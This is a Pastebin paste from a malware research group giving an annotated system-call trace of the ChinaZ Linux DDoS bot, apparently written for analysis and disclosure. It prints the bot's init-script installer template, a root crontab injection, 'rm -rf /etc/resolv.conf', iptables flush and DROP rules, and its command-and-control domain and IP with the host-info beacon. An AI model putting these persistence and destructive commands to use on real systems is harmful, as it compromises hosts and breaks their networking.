daily pastebin goal
46%
SHARE
TWEET

ChinaZ Reloaded

MalwareMustDie Jun 19th, 2015 (edited) 131 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie! ChinaZ Initial execution calls &
  2. # Networking commands
  3.  
  4. /////////////////////////
  5. //
  6. //   COMMAND EXECUTION
  7. //
  8. /////////////////////////
  9.  
  10. // run..
  11.  
  12. execve("./SAMPLE"["./SAMPLE"] )
  13.  
  14. // self copy...to /tmp with the dull name with "chinaz" in it..
  15.  
  16. uname()
  17. chdir("/tmp")
  18. readlink("/proc/self/exe", "/home/YOU/test/SAMPLE", 256)
  19. open("/home/YOU/test/SAMPLE", O_RDONLY)
  20. open("/tmp/.chinaz{1434745889", O_WRONLY|O_CREAT, 0777)
  21. read(0, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
  22. write(1, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
  23.  
  24. //installer..
  25.  
  26. #!/bin/sh\n# chkconfig: 12345 90 90\n# description: %s\n### BEGIN INIT INFO\n# Provides:\t\t%s\n# Required-Start:\t\n# Required-Stop:\t\n# Default-Start:\t1 2 3 4 5\n# Default-Stop:\t\t\n# Short-Description:\t%s\n### END INIT INFO\ncase $1 in\nstart)\n\t%s\n\t;;\nstop)\n\t;;\n*)\n\t%s\n\t;;\nesac\n
  27. #!/bin/sh\nPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin\nfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done\ncp /lib/udev/udev /lib/udev/debug\n/lib/udev/debug\n                                                                        
  28.  
  29. // setting runtime for self copied malware file...
  30.  
  31. execve("/usr/local/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  32. execve("/usr/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  33. execve("/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  34. execve("/usr/local/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  35. execve("/usr/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  36. execve("/usr/local/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  37. execve("/usr/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  38. execve("/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  39. execve("/usr/local/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  40. execve("/usr/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  41. execve("/usr/local/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  42. execve("/usr/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  43. execve("/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  44.  
  45. // deleting the original sample...
  46.  
  47. execve("/usr/local/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  48. execve("/usr/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  49. execve("/usr/local/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  50. execve("/usr/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  51. execve("/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  52. execve("/usr/local/games/chkconfig"["chkconfig""--del""SAMPLE"] )
  53. execve("/usr/games/chkconfig"["chkconfig""--del""SAMPLE"] )
  54.  
  55. // setting cron...
  56.  
  57. execve("/bin/sh"["sh""-c""sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"...] )
  58. execve("/bin/sed"["sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"] )
  59.  
  60. // deleting your resolve.conf...YES..LITERALLY!
  61.  
  62. execve("/bin/sh"["sh""-c""rm -rf /etc/resolv.conf"] )
  63. execve("/bin/rm"["rm""-rf""/etc/resolv.conf"] )
  64.  
  65. // installing the config..
  66.  
  67. execve("/bin/sh"["sh""-c""touch /home/YOU/ConfigDatecz"] )
  68. execve("/usr/bin/touch"["touch""/home/YOU/ConfigDatecz"] )
  69.  
  70. // resetting iptables & setting the malicious purpose one
  71.  
  72. execve("/bin/sh"["sh""-c""whoami"] )
  73. execve("/bin/sh"["sh""-c""iptables --flush"]
  74. execve("/usr/bin/whoami"["whoami"] )
  75. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...]
  76. execve("/bin/sh"["sh""-c""whoami"] )
  77. execve("/usr/bin/whoami"["whoami"] )
  78. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  79. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  80. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  81. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  82. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  83.         (...)
  84.  
  85. /////////////////////////
  86. //
  87. //     NETWORKING
  88. //
  89. /////////////////////////
  90.  
  91. // the checking of the loopback, local and global ethernet interface, for the iptables operations..
  92.  
  93. socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)
  94. {{"lo", {AF_INET, inet_addr("127.0.0.1")}},
  95. {"eth0", {AF_INET, inet_addr("a,b,c,d")}},
  96. {"ethn", {AF_INET, inet_addr("w,x,y,z")}}}})
  97.  
  98. // Kick DNS to request CNC domain...
  99.  
  100. socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
  101. open("/etc/resolv.conf", O_RDONLY)
  102. read(4, "nameserver DNS-ADDRESS\nnameser"..., 4096)
  103. socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP)
  104. connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
  105. send(4, "\5\237\1\0\0\1\0\0\0\0\0\0\3www\5avttx\2cn\0\0\1\0\1", 30, MSG_NOSIGNAL)
  106. recvfrom(4, "\5\237\201\200\0\1\0\1\0\2\0\6\3www\5avttx\2cn\0\0\1\0\1\300\f"
  107.             {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
  108.  
  109. // sending your hostname & etc uname infos to the CNC..
  110.  
  111. connect(3, {sa_family=AF_INET, sin_port=htons(60000), sin_addr=inet_addr("121.42.159.37")}
  112. send(-1, "ThisIsNotLinux\0\0\0\0\0\0\0\0\0\0\0\0"..., 372, 0)
  113.  
  114. // PS: Upon succcess the connection the Config.ini file wil be saved.
  115.        And the system will be rebooted and ready to be functioned as a ddoser bot.
  116.  
  117. # end
RAW Paste Data
Top